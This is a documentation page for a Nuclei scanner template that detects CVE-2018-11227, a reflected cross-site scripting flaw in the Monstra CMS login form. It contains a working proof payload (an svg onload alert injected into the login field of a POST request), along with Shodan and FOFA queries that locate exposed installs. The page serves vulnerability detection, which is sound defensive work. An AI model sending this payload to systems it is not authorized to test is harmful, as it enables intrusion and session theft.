Monstra CMS <=3.0.4 - Cross-Site Scripting
ID: CVE-2018-11227
Severity: medium
Author: ritikchaddha
Tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra
Description
Section titled “Description”Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2018-11227
info: name: Monstra CMS <=3.0.4 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 - https://github.com/monstra-cms/monstra/issues - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 epss-score: 0.02135 epss-percentile: 0.8903 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra
http: - raw: - | POST /admin/index.php?id=pages HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition: and matchers: - type: word part: body words: - "><svg/onload=alert(document.domain)>" - "Monstra" case-insensitive: true condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100ba2a51a3cfefb9aaaff025913dbe11ef4ca7eab56daaf40132d7e038fd514ce9022100a09b60111272e7e20a5d664b424f162018b74a41684bc598d159a40a909f2a24:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-11227.yaml"